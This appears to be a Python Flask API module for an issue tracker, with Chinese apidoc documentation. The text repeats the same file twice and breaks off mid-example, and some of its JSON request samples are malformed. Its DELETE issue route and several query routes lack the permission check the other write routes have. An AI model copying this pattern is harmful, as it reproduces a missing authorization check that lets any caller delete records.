@apiParam {int} level 级别
@apiParam {int} priority 优先级
@apiParam {int} system 系统
@apiParam {string} title 标题
@apiParam {string} attach 福建
@apiParam {string} description 描述
@apiParam {int} detection_chance 用户识别度
@apiParam {int} project_id 项目 ID
@apiParam {int} version 版本
@apiParam {int} creator 创建人 ID
@apiParam {int} modifier 修改人 ID
@apiParam {int} [requirement_id] 关联的 需求 ID
@apiParam {string} [tag] 标签
@apiParamExample {json} Request-Example:
{
"module_id": 340,
"handler": 93,
"issue_type": 0,
"chance": 0,
"level": 0,
"priority": 0,
"system": 4,
"title": "123",
"attach": "{\"images\":[],\"files\":[],\"videos\":[]}",
"description": "<p>test</p>",
"detection_chance": 0,
"project_id": 4,
"version": 168,
"creator": 93,
"modifier": 93,
"requirement_id": 1,
"tag": 13,14
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [],
"message": "ok"
}
"""
(system, version, project_id, module_id, modifier, handler, issue_type,
chance, level, priority, stage, title, attach, handle_status, description,
comment, detection_chance, requirement_id, case_covered, tag) = parse_json_form('issue_modify')
ret = IssueBusiness.modify(issue_id, system, version, project_id, module_id, modifier, handler, issue_type,
chance, level, priority, stage, title, attach, handle_status, description, comment,
detection_chance, requirement_id, case_covered, tag)
return json_detail_render(ret)
# 根据id修改,删除issue
@issue.route('/<int:issue_id>', methods=['DELETE'])
def issue_delete_handler(issue_id):
"""
@api {delete} /v1/issue/{int:id} 删除 缺陷
@apiName DeleteIssue
@apiGroup 项目
@apiDescription 删除 缺陷
@apiParamExample {json} Request-Example:
-
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [],
"message": "ok"
}
"""
ret = IssueBusiness.delete(issue_id)
return json_detail_render(ret)
# 切换issue状态
@issue.route('/handlestatus/<int:issue_id>', methods=['POST'])
@required(modify_permission)
@validation('POST:handle_status')
def issue_board_status_handler(issue_id):
"""
@api {post} /v1/issue/handlestatus/{int:id} 切换 缺陷状态
@apiName ModifyIssueStatus
@apiGroup 项目
@apiDescription 切换 缺陷状态
@apiParamExample {json} Request-Example:
{
"handle_status": 1
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [],
"message": "ok"
}
"""
handle_status = parse_json_form('handle_status')[0]
ret = IssueBusiness.status_switch(issue_id, handle_status)
return json_detail_render(ret)
# 切换issue处理人
@issue.route('/handler/<int:issue_id>', methods=['POST'])
@validation('POST:handler_switch')
@required(modify_permission)
def issue_handler_switch_handler(issue_id):
"""
@api {post} /v1/issue/handler/{int:id} 切换 缺陷处理人
@apiName ModifyIssueSwitch
@apiGroup 项目
@apiDescription 切换 缺陷处理人
@apiParamExample {json} Request-Example:
{
"handler": 11
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [],
"message": "ok"
}
"""
handler = parse_json_form('handler_switch')
ret = IssueBusiness.handler_switch(issue_id, handler)
return json_detail_render(ret)
# 切换issue等级
@issue.route('/level/<int:issue_id>', methods=['POST'])
@required(modify_permission)
@validation('POST:level_switch')
def issue_level_switch_handler(issue_id):
"""
@api {post} /v1/issue/level/{int:id} 切换 缺陷等级
@apiName ModifyIssueLevel
@apiGroup 项目
@apiDescription 切换 缺陷等级
@apiParamExample {json} Request-Example:
{
"level": 3
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [],
"message": "ok"
}
"""
level = parse_json_form('level_switch')
ret = IssueBusiness.level_switch(issue_id, level)
return json_detail_render(ret)
# 切换issue优先级
@issue.route('/priority/<int:issue_id>', methods=['POST'])
@required(modify_permission)
@validation('POST:priority_switch')
def issue_priority_switch_handler(issue_id):
"""
@api {post} /v1/issue/priority/{int:id} 切换 缺陷优先级
@apiName ModifyIssuePriority
@apiGroup 项目
@apiDescription 切换 缺陷优先级
@apiParamExample {json} Request-Example:
{
"priority": 3
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [],
"message": "ok"
}
"""
priority = parse_json_form('priority_switch')
ret = IssueBusiness.priority_switch(issue_id, priority)
return json_detail_render(ret)
# 修改issue的comment
@issue.route('/comment/<int:issue_id>', methods=['POST'])
@validation('POST:add_comment')
@required(modify_permission)
def issue_add_comment_handler(issue_id):
"""
@api {post} /v1/issue/comment/{int:id} 切换 缺陷备注
@apiName ModifyIssueComment
@apiGroup 项目
@apiDescription 切换 缺陷备注
@apiParamExample {json} Request-Example:
{
"comment": 3
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [],
"message": "ok"
}
"""
comment = parse_json_form('add_comment')
ret = IssueBusiness.add_comment(issue_id, comment)
return json_detail_render(ret)
# 查询issue-projectid,versionid
@issue.route('/', methods=['GET'])
def issue_query_all_handler():
"""
@api {get} /v1/issue/ 查询 issue 列表
@apiName SearchIssue
@apiGroup 项目
@apiDescription 查询 issue 列表
@apiParam {int} [projectid] 项目 ID
@apiParam {int} [versionid] 版本 ID
@apiParam {string} [creator_id] 创建人 ID,使用 ',' 分割
@apiParam {string} [handler_id] 处理人 ID,使用 ',' 分割
@apiParam {int} [title] 标题
@apiParam {string} [handle_status] 处理状态 ID,使用 ',' 分割
@apiParam {string} [module_id] 模块 ID,使用 ',' 分割
@apiParam {string} [priority] 优先级 ID,使用 ',' 分割
@apiParam {int} [page_size] 分页 页面大小
@apiparam {int} [page_index] 分页 页数
@apiParamExample {json} Request-Example:
{
"projectid": 4,
"versionid": 173,
"creator_id": "1,2,3,4",
"page_size": 1
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [
{
"attach": "{"images":[],"files":[],"videos":[]}",
"chance": 2,
"comment": "",
"creation_time": "2019-08-08 20:58:49",
"creator": [
{
"id": 96,
"name": "张宇"
}
],
"description": "",
"detection_chance": "",
"handle_status": 2,
"handler": [
{
"id": 96,
"name": "张宇"
}
],
"issue_number": "T398",
"issue_type": 1,
"issueid": 398,
"level": 1,
"modified_time": "2019-08-08 20:58:49",
"modifier": [],
"module": [
{
"id": 329,
"name": "用例二级2222"
}
],
"priority": 1,
"project_id": 4,
"rank": 12,
"reopen": 0,
"repair_time": "",
"requirement_id": "",
"requirement_title": "",
"stage": "",
"status": 0,
"system": "",
"test_time": "",
"title": "1.2.7issuse55555",
"version": [
{
"id": 173,
"name": "1.2.7"
}
],
"weight": ""
}
],
"message": "ok",
"page_index": 1,
"page_size": 1,
"total": 8
}
"""
requirement_id = request.args.get('requirement_id')
if requirement_id:
page_size, page_index = parse_list_args2()
data, count = IssueBusiness.paginate_data_by_rid(page_size, page_index, requirement_id)
return json_list_render2(0, data, page_size, page_index, count)
else:
page_size, page_index = parse_list_args2()
data, count = IssueBusiness.paginate_data(page_size, page_index)
return json_list_render2(0, data, page_size, page_index, count)
# 查询issue历史记录
@issue.route('/record', methods=['GET'])
def issue_record_query_all_handler():
"""
@api {get} /v1/issue/record 查询 缺陷历史记录列表
@apiName GetIssueRecordList
@apiGroup 项目
@apiDescription 查询 缺陷历史记录列表
@apiParam {int} projectid 项目 ID
@apiParam {int} versionid 版本 ID
@apiParamExample {json} Request-Example:
?projectid=1
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [
{
"attach": "{"images":[],"files":[],"videos":[]}",
"chance": 0,
"comment": "",
"creation_time": "2019-05-10 16:23:28",
"creator": [
{
"id": 12,
"name": "刘焕焕"
}
],
"description": "<p>分享微信不成功.</p>",
"detection_chance": 0,
"handle_status": 1,
"handler": [
{
"id": 12,
"name": "刘焕焕"
}
],
"issue_number": "T309",
"issue_type": 0,
"issueid": 309,
"level": 1,
"modified_time": "2019-05-13 13:02:45",
"modifier": [],
"module": [
{
"id": 291,
"name": "V2.4.9版本用例飞科"
}
],
"priority": 1,
"project_id": 1,
"rank": 20,
"reopen": 0,
"repair_time": "",
"requirement_id": "",
"requirement_title": "",
"stage": "",
"status": 0,
"system": 1,
"test_time": "",
"title": "分享微信不成功",
"version": [
{
"id": 128,
"name": "V2.4.9"
}
],
"weight": ""
}
],
"message": "ok"
}
"""
data = IssueRecordBusiness.query_all_json()
return json_detail_render(0, data)
# 查询issue历史记录详情
@issue.route('/record/detail/<int:issue_id>', methods=['GET'])
def issue_record_detail_handler(issue_id):
"""
@api {get} /v1/issue/record/detail/{int:issue_id} 查询 缺陷历史记录详情
@apiName GetIssueRecordDetailById
@apiGroup 项目
@apiDescription 查询 缺陷历史记录详情
@apiParamExample {json} Request-Example:
-
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [
{
"modified_time": "2018-12-19 14:59:34",
"modifier_id": 1,
"modifier_name": "王金龙",
"operation": "修改了处理状态 待办 为 处理中"
},
{
"modified_time": "2018-12-18 20:28:39",
"modifier_id": 1,
"modifier_name": "王金龙",
"operation": "创建了BUG title"
}
],
"message": "ok"
}
"""
data = IssueRecordBusiness.query_record_detail(issue_id)
return json_detail_render(0, data)
# 根据id查询issue
@issue.route('/<int:issue_id>', methods=['GET'])
def issue_query_handler(issue_id):
"""
@api {get} /v1/issue/{int:issue_id} 查询 缺陷详情 (id)
@apiName GetIssueById
@apiGroup 项目
@apiDescription 查询 缺陷详情 通过 ID
@apiParamExample {json} Request-Example:
-
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code":0,
"data":[
{
"attach":"attach",
"chance":1,
"comment":"",
"creation_time":"2018-12-18 20:28:39",
"creator":[
{
"id":1,
"name":"王金龙"
}
],
"description":"description",
"handle_status":3,
"handler":[
{
"id":1,
"name":"王金龙"
}
],
"issue_number":"T1",
"issue_type":1,
"issueid":1,
"level":1,
"modified_time":"2019-03-01 16:46:10",
"modifier":[
{
"id":1,
"name":"王金龙"
}
],
"module":[
{
"id":1,
"name":"音频"
}
],
"priority":1,
"project_id":1,
"reopen":0,
"repair_time":"0:00:05",
"requirement_id":"",
"requirement_title":"",
"stage":1,
"status":0,
"system":0,
"test_time":"2 days, 20:21:05",
"title":"title",
"version":[
{
"id":1,
"name":"str"
}
],
"weight":""
}
],
"message":"ok"
}
"""
data = IssueBusiness.query_by_id(issue_id)
return json_detail_render(0, data)
# issue关闭和打开的dashboard
@issue.route('/dashboard', methods=['POST'])
@required(view_permission)
@validation('POST:issue_dashboard')
def issue_dashboard_work_handler():
start_date, end_date = parse_json_form('issue_dashboard')
data = IssueDashBoardBusiness.issue_dashboard(start_date, end_date)
return json_detail_render(0, data)
# 查询测试人员每天创建的issue个数
@issue.route('/dashboard/tester', methods=['POST'])
@required(view_permission)
@validation('POST:issue_dashboard')
def tester_issue_work_handler():
start_date, end_date = parse_json_form('issue_dashboard')
data = IssueDashBoardBusiness.issue_all_tester_dashboard(start_date, end_date)
return json_detail_render(0, data)
# issue的状态分布和优先级分布
@issue.route('/dashboard/project', methods=['POST'])
@required(view_permission)
@validation('POST:issue_dashboard')
def issue_project_dashboard_handler():
"""
@api {POST} /v1/issue/dashboard/project 查询 缺陷状态分布和优先级分布
@apiName GetIssueByStatusAndPriority
@apiGroup 项目
@apiDescription 查询 缺陷状态分布和优先级分布
@apiParamExample {json} Request-Example:
{
"start_date": "2019-01-02 10:10:11",
"end_date": "2019-01-03 10:10:12",
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [
{
"modified_time": "2018-12-19 14:59:34",
"modifier_id": 1,
"modifier_name": "王金龙",
"operation": "修改了处理状态 待办 为 处理中"
},
{
"modified_time": "2018-12-18 20:28:39",
"modifier_id": 1,
"modifier_name": "王金龙",
"operation": "创建了BUG title"
}
],
"message": "ok"
}
"""
start_date, end_date = parse_json_form('issue_dashboard')
data = IssueDashBoardBusiness.issue_project_dashboard(start_date, end_date)
return json_detail_render(0, data)
# 看板根据pro_id查询issue各个状态的数量
@issue.route('/dashboard/project/<int:pro_id>', methods=['GET'])
def issue_query_pro_handler(pro_id):
"""
@api {post} /v1/issue/dashboard/project/{int:project_id} 查询 看板缺陷 根据 project ID
@apiName GetBoardIssueByProjectId
@apiGroup 项目
@apiDescription 根据 project ID 查询 看板缺陷
@apiParamExample {json} Request-Example:
-
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code":0,
"data":[
{
"info":[
{
"detail":[
{
"count":1,
"handle_status":1
},
{
"count":1,
"handle_status":2
},
{
"count":1,
"handle_status":3
}
],
"total":3,
"version":1
},
{
"detail":[
{
"count":1,
"handle_status":4
}
],
"total":1,
"version":2
},
{
"detail":[
{
"count":1,
"handle_status":1
}
],
"total":1,
"version":3
},
{
"detail":[
{
"count":3,
"handle_status":4
}
],
"total":3,
"version":4
},
{
"detail":[
{
"count":1,
"handle_status":1
},
{
"count":1,
"handle_status":4
}
],
"total":2,
"version":128
}
],
"project_id":1
}
],
"message":"ok"
}
"""
data = IssueDashBoardBusiness.issue_project_id_dashboard(pro_id)
return json_detail_render(0, data)
# 绑定 issue 到 requirement
@issue.route('/bind/requirement', methods=['POST'])
@required(modify_permission)
@validation('POST:issue_bind_requirement')
def issue_bind_requirement():
"""
@api {post} /v1/issue/bind/requirement 绑定 缺陷 issue 到 需求 requirement
@apiName IssueBindRequirement
@apiGroup 项目
@apiDescription 绑定 缺陷到需求
@apiParam {int} issue_id 缺陷 ID
@apiParam {int} requirement_id 需求 ID
@apiParamExample {json} Request-Example:
{
"issue": 11,
"requirement_id": 22
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [],
"message": "ok"
}
"""
requirement_id, issue_id = parse_json_form('issue_bind_requirement')
ret, msg = IssueBusiness.issue_bind_requirement(issue_id, requirement_id)
return json_detail_render(ret, [], msg)
# 导出 issue 列表
@issue.route('/export', methods=['GET'])
def issue_export():
"""
@api {get} /v1/issue/ 导出 issue 到 xls
@apiName IssueExportToXls
@apiGroup 项目
@apiDescription 导出 issue 到 xls
@apiParam {int} [projectid] 项目 ID
@apiParam {int} [versionid] 版本 ID
@apiParam {int} [creator_id] 创建人 ID
@apiParam {int} [title] 标题
@apiParam {int} [handle_status] 处理状态 ID
@apiParam {int} [module_id] 模块 ID
@apiParam {int} [priority] 优先级 ID
@apiParam {int} [page_size] 分页 页面大小
@apiparam {int} [page_index] 分页 页数
@apiParamExample {json} Request-Example:
{
"projectid": 4,
"versionid": 173,
"page_size": 1
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": "http://tcloud-static.oss-cn-beijing.aliyuncs.com/issue_export/0/Issues-20190809.164431.xls",
"message": "ok"
}
"""
issue_url = IssueBusiness.export()
return json_detail_render(code=0, data=issue_url)
| from flask import request
from apps.auth.auth_require import required
from apps.project.business.issue import IssueBusiness, IssueRecordBusiness, IssueDashBoardBusiness
from apps.project.extentions import parse_json_form, validation, parse_list_args2
from library.api.render import json_detail_render, json_list_render2
from library.api.tBlueprint import tblueprint
bpname = 'issue'
view_permission = f'{bpname}_view'
modify_permission = f'{bpname}_modify'
issue = tblueprint(bpname, __name__)
# 新增issue
@issue.route('/', methods=['POST'])
@required(modify_permission)
@validation('POST:issue_create')
def issue_add_handler():
"""
@api {post} /v1/issue 新增 缺陷
@apiName CreateIssue
@apiGroup 项目
@apiDescription 新增 缺陷
@apiParam {int} module_id 模块 ID
@apiParam {int} handler 处理人 ID
@apiParam {int} issue_type 类型
@apiParam {int} chance 出现几率
@apiParam {int} level 级别
@apiParam {int} priority 优先级
@apiParam {int} system 系统
@apiParam {string} title 标题
@apiParam {string} attach 福建
@apiParam {string} description 描述
@apiParam {int} detection_chance 用户识别度
@apiParam {int} project_id 项目 ID
@apiParam {int} version 版本
@apiParam {int} creator 创建人 ID
@apiParam {int} modifier 修改人 ID
@apiParam {int} [requirement_id] 关联的 需求 ID
@apiParam {string} [tag] 标签
@apiParamExample {json} Request-Example:
{
"module_id": 340,
"handler": 93,
"issue_type": 0,
"chance": 0,
"level": 0,
"priority": 0,
"system": 4,
"title": "123",
"attach": "{\"images\":[],\"files\":[],\"videos\":[]}",
"description": "<p>test</p>",
"detection_chance": 0,
"project_id": 4,
"version": 168,
"creator": 93,
"modifier": 93,
"requirement_id": 123,
"tag": 13,14
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [],
"message": "ok"
}
"""
(system, version, project_id, module_id, creator, modifier, handler,
issue_type, chance, level, priority, stage,title, attach, handle_status,
description, comment, detection_chance, requirement_id, case_covered, tag) = parse_json_form('issue_create')
ret = IssueBusiness.create(system, version, project_id, module_id, creator, modifier, handler, issue_type,
chance, level, priority, stage, title, attach, handle_status, description, comment,
detection_chance, requirement_id, case_covered, tag)
return json_detail_render(ret)
# 根据id修改,删除issue
@issue.route('/<int:issue_id>', methods=['POST'])
@required(modify_permission)
@validation('POST:issue_modify')
def issue_modify_handler(issue_id):
"""
@api {post} /v1/issue/{int:id} 修改 缺陷
@apiName ModifyIssue
@apiGroup 项目
@apiDescription 修改 缺陷
@apiParam {int} module_id 模块 ID
@apiParam {int} handler 处理人 ID
@apiParam {int} issue_type 类型
@apiParam {int} chance 出现几率
@apiParam {int} level 级别
@apiParam {int} priority 优先级
@apiParam {int} system 系统
@apiParam {string} title 标题
@apiParam {string} attach 福建
@apiParam {string} description 描述
@apiParam {int} detection_chance 用户识别度
@apiParam {int} project_id 项目 ID
@apiParam {int} version 版本
@apiParam {int} creator 创建人 ID
@apiParam {int} modifier 修改人 ID
@apiParam {int} [requirement_id] 关联的 需求 ID
@apiParam {string} [tag] 标签
@apiParamExample {json} Request-Example:
{
"module_id": 340,
"handler": 93,
"issue_type": 0,
"chance": 0,
"level": 0,
"priority": 0,
"system": 4,
"title": "123",
"attach": "{\"images\":[],\"files\":[],\"videos\":[]}",
"description": "<p>test</p>",
"detection_chance": 0,
"project_id": 4,
"version": 168,
"creator": 93,
"modifier": 93,
"requirement_id": 1,
"tag": 13,14
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [],
"message": "ok"
}
"""
(system, version, project_id, module_id, modifier, handler, issue_type,
chance, level, priority, stage, title, attach, handle_status, description,
comment, detection_chance, requirement_id, case_covered, tag) = parse_json_form('issue_modify')
ret = IssueBusiness.modify(issue_id, system, version, project_id, module_id, modifier, handler, issue_type,
chance, level, priority, stage, title, attach, handle_status, description, comment,
detection_chance, requirement_id, case_covered, tag)
return json_detail_render(ret)
# 根据id修改,删除issue
@issue.route('/<int:issue_id>', methods=['DELETE'])
def issue_delete_handler(issue_id):
"""
@api {delete} /v1/issue/{int:id} 删除 缺陷
@apiName DeleteIssue
@apiGroup 项目
@apiDescription 删除 缺陷
@apiParamExample {json} Request-Example:
-
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [],
"message": "ok"
}
"""
ret = IssueBusiness.delete(issue_id)
return json_detail_render(ret)
# 切换issue状态
@issue.route('/handlestatus/<int:issue_id>', methods=['POST'])
@required(modify_permission)
@validation('POST:handle_status')
def issue_board_status_handler(issue_id):
"""
@api {post} /v1/issue/handlestatus/{int:id} 切换 缺陷状态
@apiName ModifyIssueStatus
@apiGroup 项目
@apiDescription 切换 缺陷状态
@apiParamExample {json} Request-Example:
{
"handle_status": 1
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [],
"message": "ok"
}
"""
handle_status = parse_json_form('handle_status')[0]
ret = IssueBusiness.status_switch(issue_id, handle_status)
return json_detail_render(ret)
# 切换issue处理人
@issue.route('/handler/<int:issue_id>', methods=['POST'])
@validation('POST:handler_switch')
@required(modify_permission)
def issue_handler_switch_handler(issue_id):
"""
@api {post} /v1/issue/handler/{int:id} 切换 缺陷处理人
@apiName ModifyIssueSwitch
@apiGroup 项目
@apiDescription 切换 缺陷处理人
@apiParamExample {json} Request-Example:
{
"handler": 11
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [],
"message": "ok"
}
"""
handler = parse_json_form('handler_switch')
ret = IssueBusiness.handler_switch(issue_id, handler)
return json_detail_render(ret)
# 切换issue等级
@issue.route('/level/<int:issue_id>', methods=['POST'])
@required(modify_permission)
@validation('POST:level_switch')
def issue_level_switch_handler(issue_id):
"""
@api {post} /v1/issue/level/{int:id} 切换 缺陷等级
@apiName ModifyIssueLevel
@apiGroup 项目
@apiDescription 切换 缺陷等级
@apiParamExample {json} Request-Example:
{
"level": 3
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [],
"message": "ok"
}
"""
level = parse_json_form('level_switch')
ret = IssueBusiness.level_switch(issue_id, level)
return json_detail_render(ret)
# 切换issue优先级
@issue.route('/priority/<int:issue_id>', methods=['POST'])
@required(modify_permission)
@validation('POST:priority_switch')
def issue_priority_switch_handler(issue_id):
"""
@api {post} /v1/issue/priority/{int:id} 切换 缺陷优先级
@apiName ModifyIssuePriority
@apiGroup 项目
@apiDescription 切换 缺陷优先级
@apiParamExample {json} Request-Example:
{
"priority": 3
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [],
"message": "ok"
}
"""
priority = parse_json_form('priority_switch')
ret = IssueBusiness.priority_switch(issue_id, priority)
return json_detail_render(ret)
# 修改issue的comment
@issue.route('/comment/<int:issue_id>', methods=['POST'])
@validation('POST:add_comment')
@required(modify_permission)
def issue_add_comment_handler(issue_id):
"""
@api {post} /v1/issue/comment/{int:id} 切换 缺陷备注
@apiName ModifyIssueComment
@apiGroup 项目
@apiDescription 切换 缺陷备注
@apiParamExample {json} Request-Example:
{
"comment": 3
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [],
"message": "ok"
}
"""
comment = parse_json_form('add_comment')
ret = IssueBusiness.add_comment(issue_id, comment)
return json_detail_render(ret)
# 查询issue-projectid,versionid
@issue.route('/', methods=['GET'])
def issue_query_all_handler():
"""
@api {get} /v1/issue/ 查询 issue 列表
@apiName SearchIssue
@apiGroup 项目
@apiDescription 查询 issue 列表
@apiParam {int} [projectid] 项目 ID
@apiParam {int} [versionid] 版本 ID
@apiParam {string} [creator_id] 创建人 ID,使用 ',' 分割
@apiParam {string} [handler_id] 处理人 ID,使用 ',' 分割
@apiParam {int} [title] 标题
@apiParam {string} [handle_status] 处理状态 ID,使用 ',' 分割
@apiParam {string} [module_id] 模块 ID,使用 ',' 分割
@apiParam {string} [priority] 优先级 ID,使用 ',' 分割
@apiParam {int} [page_size] 分页 页面大小
@apiparam {int} [page_index] 分页 页数
@apiParamExample {json} Request-Example:
{
"projectid": 4,
"versionid": 173,
"creator_id": "1,2,3,4",
"page_size": 1
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [
{
"attach": "{"images":[],"files":[],"videos":[]}",
"chance": 2,
"comment": "",
"creation_time": "2019-08-08 20:58:49",
"creator": [
{
"id": 96,
"name": "张宇"
}
],
"description": "",
"detection_chance": "",
"handle_status": 2,
"handler": [
{
"id": 96,
"name": "张宇"
}
],
"issue_number": "T398",
"issue_type": 1,
"issueid": 398,
"level": 1,
"modified_time": "2019-08-08 20:58:49",
"modifier": [],
"module": [
{
"id": 329,
"name": "用例二级2222"
}
],
"priority": 1,
"project_id": 4,
"rank": 12,
"reopen": 0,
"repair_time": "",
"requirement_id": "",
"requirement_title": "",
"stage": "",
"status": 0,
"system": "",
"test_time": "",
"title": "1.2.7issuse55555",
"version": [
{
"id": 173,
"name": "1.2.7"
}
],
"weight": ""
}
],
"message": "ok",
"page_index": 1,
"page_size": 1,
"total": 8
}
"""
requirement_id = request.args.get('requirement_id')
if requirement_id:
page_size, page_index = parse_list_args2()
data, count = IssueBusiness.paginate_data_by_rid(page_size, page_index, requirement_id)
return json_list_render2(0, data, page_size, page_index, count)
else:
page_size, page_index = parse_list_args2()
data, count = IssueBusiness.paginate_data(page_size, page_index)
return json_list_render2(0, data, page_size, page_index, count)
# 查询issue历史记录
@issue.route('/record', methods=['GET'])
def issue_record_query_all_handler():
"""
@api {get} /v1/issue/record 查询 缺陷历史记录列表
@apiName GetIssueRecordList
@apiGroup 项目
@apiDescription 查询 缺陷历史记录列表
@apiParam {int} projectid 项目 ID
@apiParam {int} versionid 版本 ID
@apiParamExample {json} Request-Example:
?projectid=1
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [
{
"attach": "{"images":[],"files":[],"videos":[]}",
"chance": 0,
"comment": "",
"creation_time": "2019-05-10 16:23:28",
"creator": [
{
"id": 12,
"name": "刘焕焕"
}
],
"description": "<p>分享微信不成功.</p>",
"detection_chance": 0,
"handle_status": 1,
"handler": [
{
"id": 12,
"name": "刘焕焕"
}
],
"issue_number": "T309",
"issue_type": 0,
"issueid": 309,
"level": 1,
"modified_time": "2019-05-13 13:02:45",
"modifier": [],
"module": [
{
"id": 291,
"name": "V2.4.9版本用例飞科"
}
],
"priority": 1,
"project_id": 1,
"rank": 20,
"reopen": 0,
"repair_time": "",
"requirement_id": "",
"requirement_title": "",
"stage": "",
"status": 0,
"system": 1,
"test_time": "",
"title": "分享微信不成功",
"version": [
{
"id": 128,
"name": "V2.4.9"
}
],
"weight": ""
}
],
"message": "ok"
}
"""
data = IssueRecordBusiness.query_all_json()
return json_detail_render(0, data)
# 查询issue历史记录详情
@issue.route('/record/detail/<int:issue_id>', methods=['GET'])
def issue_record_detail_handler(issue_id):
"""
@api {get} /v1/issue/record/detail/{int:issue_id} 查询 缺陷历史记录详情
@apiName GetIssueRecordDetailById
@apiGroup 项目
@apiDescription 查询 缺陷历史记录详情
@apiParamExample {json} Request-Example:
-
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [
{
"modified_time": "2018-12-19 14:59:34",
"modifier_id": 1,
"modifier_name": "王金龙",
"operation": "修改了处理状态 待办 为 处理中"
},
{
"modified_time": "2018-12-18 20:28:39",
"modifier_id": 1,
"modifier_name": "王金龙",
"operation": "创建了BUG title"
}
],
"message": "ok"
}
"""
data = IssueRecordBusiness.query_record_detail(issue_id)
return json_detail_render(0, data)
# 根据id查询issue
@issue.route('/<int:issue_id>', methods=['GET'])
def issue_query_handler(issue_id):
"""
@api {get} /v1/issue/{int:issue_id} 查询 缺陷详情 (id)
@apiName GetIssueById
@apiGroup 项目
@apiDescription 查询 缺陷详情 通过 ID
@apiParamExample {json} Request-Example:
-
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code":0,
"data":[
{
"attach":"attach",
"chance":1,
"comment":"",
"creation_time":"2018-12-18 20:28:39",
"creator":[
{
"id":1,
"name":"王金龙"
}
],
"description":"description",
"handle_status":3,
"handler":[
{
"id":1,
"name":"王金龙"
}
],
"issue_number":"T1",
"issue_type":1,
"issueid":1,
"level":1,
"modified_time":"2019-03-01 16:46:10",
"modifier":[
{
"id":1,
"name":"王金龙"
}
],
"module":[
{
"id":1,
"name":"音频"
}
],
"priority":1,
"project_id":1,
"reopen":0,
"repair_time":"0:00:05",
"requirement_id":"",
"requirement_title":"",
"stage":1,
"status":0,
"system":0,
"test_time":"2 days, 20:21:05",
"title":"title",
"version":[
{
"id":1,
"name":"str"
}
],
"weight":""
}
],
"message":"ok"
}
"""
data = IssueBusiness.query_by_id(issue_id)
return json_detail_render(0, data)
# issue关闭和打开的dashboard
@issue.route('/dashboard', methods=['POST'])
@required(view_permission)
@validation('POST:issue_dashboard')
def issue_dashboard_work_handler():
start_date, end_date = parse_json_form('issue_dashboard')
data = IssueDashBoardBusiness.issue_dashboard(start_date, end_date)
return json_detail_render(0, data)
# 查询测试人员每天创建的issue个数
@issue.route('/dashboard/tester', methods=['POST'])
@required(view_permission)
@validation('POST:issue_dashboard')
def tester_issue_work_handler():
start_date, end_date = parse_json_form('issue_dashboard')
data = IssueDashBoardBusiness.issue_all_tester_dashboard(start_date, end_date)
return json_detail_render(0, data)
# issue的状态分布和优先级分布
@issue.route('/dashboard/project', methods=['POST'])
@required(view_permission)
@validation('POST:issue_dashboard')
def issue_project_dashboard_handler():
"""
@api {POST} /v1/issue/dashboard/project 查询 缺陷状态分布和优先级分布
@apiName GetIssueByStatusAndPriority
@apiGroup 项目
@apiDescription 查询 缺陷状态分布和优先级分布
@apiParamExample {json} Request-Example:
{
"start_date": "2019-01-02 10:10:11",
"end_date": "2019-01-03 10:10:12",
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [
{
"modified_time": "2018-12-19 14:59:34",
"modifier_id": 1,
"modifier_name": "王金龙",
"operation": "修改了处理状态 待办 为 处理中"
},
{
"modified_time": "2018-12-18 20:28:39",
"modifier_id": 1,
"modifier_name": "王金龙",
"operation": "创建了BUG title"
}
],
"message": "ok"
}
"""
start_date, end_date = parse_json_form('issue_dashboard')
data = IssueDashBoardBusiness.issue_project_dashboard(start_date, end_date)
return json_detail_render(0, data)
# 看板根据pro_id查询issue各个状态的数量
@issue.route('/dashboard/project/<int:pro_id>', methods=['GET'])
def issue_query_pro_handler(pro_id):
"""
@api {post} /v1/issue/dashboard/project/{int:project_id} 查询 看板缺陷 根据 project ID
@apiName GetBoardIssueByProjectId
@apiGroup 项目
@apiDescription 根据 project ID 查询 看板缺陷
@apiParamExample {json} Request-Example:
-
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code":0,
"data":[
{
"info":[
{
"detail":[
{
"count":1,
"handle_status":1
},
{
"count":1,
"handle_status":2
},
{
"count":1,
"handle_status":3
}
],
"total":3,
"version":1
},
{
"detail":[
{
"count":1,
"handle_status":4
}
],
"total":1,
"version":2
},
{
"detail":[
